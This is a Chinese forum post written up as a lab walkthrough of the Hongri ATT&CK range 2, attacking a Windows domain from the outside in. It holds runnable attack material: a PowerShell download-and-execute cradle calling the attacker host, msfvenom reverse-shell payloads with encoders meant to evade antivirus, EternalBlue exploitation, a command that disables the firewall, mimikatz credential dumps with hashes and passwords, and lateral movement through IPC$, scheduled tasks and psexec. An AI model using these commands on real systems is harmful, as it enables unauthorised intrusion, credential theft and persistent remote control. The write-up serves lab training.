qidao123.com技术社区-IT企服评测·应用市场»论坛 安全 网络安全 红日安全ATT&CK靶机实战二

红日安全ATT&CK靶机实战二

[复制链接]
发表于 2024-8-4 16:01:54 | 显示全部楼层 |阅读模式
配置环境

红日靶场2-wp - lockly - 博客园 (cnblogs.com)
IP账号暗码kali192.168.28.129root12345web192.168.28.80
10.10.10.80WEB\de1ayAdmin@123pc192.168.28.201
10.10.10.201delay\mssql1qaz@WSXDC10.10.10.10delay\delay1qaz@WSX 网1:nat不改,去改他们的静态ip
网2:新建内网ip段
外网打点

好,冒充我们发现外网ip 192.168.28.80
nmap开扫端口,服务版本信息
  1. nmap -sS -Pn -sV -T4 192.168.28.80
复制代码

一言顶针熟悉的永恒之蓝,mssql,rdp,weblogic服务
   45端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。
  7001端口说明目标IP存在weblogic服务可能存在反序列化,SSRF,恣意文件上传,后台路径泄漏
  139端口,就存在Samba服务,就可能存在爆破/未授权访问/长途下令执行漏洞
  1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。
  3389端口,就存在长途桌面。
  web界面weblogic访问一下

很好,404最少开了,漏扫一下

编码GBK,乐成执行

下一步进行进行本机信息收集
  1. systeminfo
复制代码


  1. 主机名:WEB
  2. 系统: Microsoft Windows Server 2008 R2 Standard
  3. 域:               de1ay.com
  4. 补丁:            [01]: KB2999226
  5.                   [02]: KB958488
  6.                   [03]: KB976902   
  7. //可进行Windows内核提权
  8. 内网IP:10.10.10.80
复制代码
之后的思路:
msf生成马,监听上线派生cs大保健
msf生成马,监听上线进行提权,域信息收集
方式1cs传马

cs生成一个power脚本语句不行
  1. powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.129:81/a'))"
复制代码
工具生成一个内存马连接蚁剑


cs生成木马传上去


乐成上线

方式2msf派生cs

msf找具体漏洞exp打

一:具体服务工具检测漏洞

二:nmap漏洞扫描
  1. nmap --script=vuln 192.168.28.147
复制代码


我们直接永恒之蓝打一波
  1. search ms17_010
  2. use exploit/windows/smb/ms17_010_eternalblue
  3. show options  //查看需要添加什么参数
  4. run  //exploit
复制代码

打不通大概率开防火墙
关闭防火墙再试试
  1. netsh firewall set opmode disable
复制代码

好还是打不通换漏洞exp大概直接传马监听
msf生成肴杂马监听shell

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.129 lport=7777 -i 5 -f exe -o vip.exe
  2. //简易版
复制代码
  1. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vip.exe
复制代码
  -a 64位 86 :32位
  –platfrom 平台,win,linux
  -p playload
  -b 去掉坏字符 x00:十六编码 空格的意思
  -e 编码器 //过免杀
  -i 编码次数
  -f 文件情势
  -o output输出结果
  可根据编码格式制作肴杂马



msf启动监听
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 192.168.28.129
  4. run
复制代码

启动exe

bg退出会话,sessions -l查看会话id
监听乐成,进行派生会话cs
  1. msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
  2. msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
  3. payload => windows/meterpreter/reverse_http
  4. msf6 exploit(windows/local/payload_inject) > set lhost 192.168.28.129
  5. lhost => 192.168.28.129
  6. msf6 exploit(windows/local/payload_inject) > set lport 8888
  7. lport => 8888
  8. msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
  9. disablepayloadhandler => true
  10. msf6 exploit(windows/local/payload_inject) > set prependmigrate true
  11. prependmigrate => true
  12. msf6 exploit(windows/local/payload_inject) > set session 1
  13. session => 1
  14. msf6 exploit(windows/local/payload_inject) > run
复制代码

内网渗出

开始cs大保健
先辈行提权操作,好比绕过可恶的UAC

进行主机信息收集
  1. whoami /all  //可获取用户sid
复制代码

本机暗码凭证信息
  1. logonpasswords
复制代码
  1. User Name         : de1ay
  2. Domain            : WEB
  3. SID               : S-1-5-21-3767205380-3469466069-2137393323-1000
  4. LM       : 6f08d7b306b1dad4b75e0c8d76954a50
  5.          * NTLM     : 570a9a65db8fba761c1008a51d4c95ab
  6.          * SHA1     : 759e689a07a84246d0b202a80f5fd9e335ca5392
  7. Username :        de1ay.com
  8.          * Domain   : WEB
  9.          * Password : Admin@123
复制代码

也可以dlogonpasswords
ump下来其sam文件大概lsass文件用mimikatz读取其NTLM在进行破解获取明文暗码
logonpasswords
也获取了到了其他主机信息凭证,这里先不用那些凭证,我们进行信息收集


之后进行内网信息收集
  1. net time /domain    //确定域环境
复制代码

确定域管理员
  1. shell net group "domain admins" /domain
复制代码

我们已经知道web机器内网ip为10.10.10.80,我们扫描c段
上传fscan
  1. shell fscan_1.7.0.exe -h 10.10.10.0/24
复制代码

扫到10.10.10.10是DC,永恒之蓝漏洞可以突破

可以通过域控凭证进行ipc连接传马,psexec横向上线
也可以不用凭证利用ms14-068拿下域管
ipc连接

与域控创建ipc连接
  1. shell net use \\10.10.10.10 1qaz@WSX /user:administrator
复制代码

访问域控c盘
  1. shell dir \\10.10.10.10\c$
复制代码

复制马到域控c盘
  1. shell copy C:\Windows\System32\test.exe \\10.10.10.10\c$
复制代码

创建计划使命
  1. shell schtasks /create /u Administrator /p 1qaz@WSX /s 10.10.10.10 /tn hack /sc onstart /tr c:\test.exe /ru system /f
复制代码

启动计划使命
  1. shell schtasks /run /u Administrator /p 1qaz@WSX /s 10.10.10.10 /i /tn hack
复制代码

没上线可能有防火墙换思路
psexec横向

创建监听

进行psexec横向


乐成上线

ms14-068

   利用条件:
  1、获取域平凡用户的账号暗码
2、获取域平凡用户的sid
3、服务器未打KB3011780补丁
  先看看web机子有没有补丁

WEB的sid
  1. web\de1ay S-1-5-21-3767205380-3469466069-2137393323-1000
复制代码

80机器登录的是web域打不了ms14068,201机器肯定行
这里直接psexec横向201机器,域管账号横向上线



至此全部买通,当然此靶场另有很多方式去打,盼望其他师傅多多补充

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

反转基因福娃
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表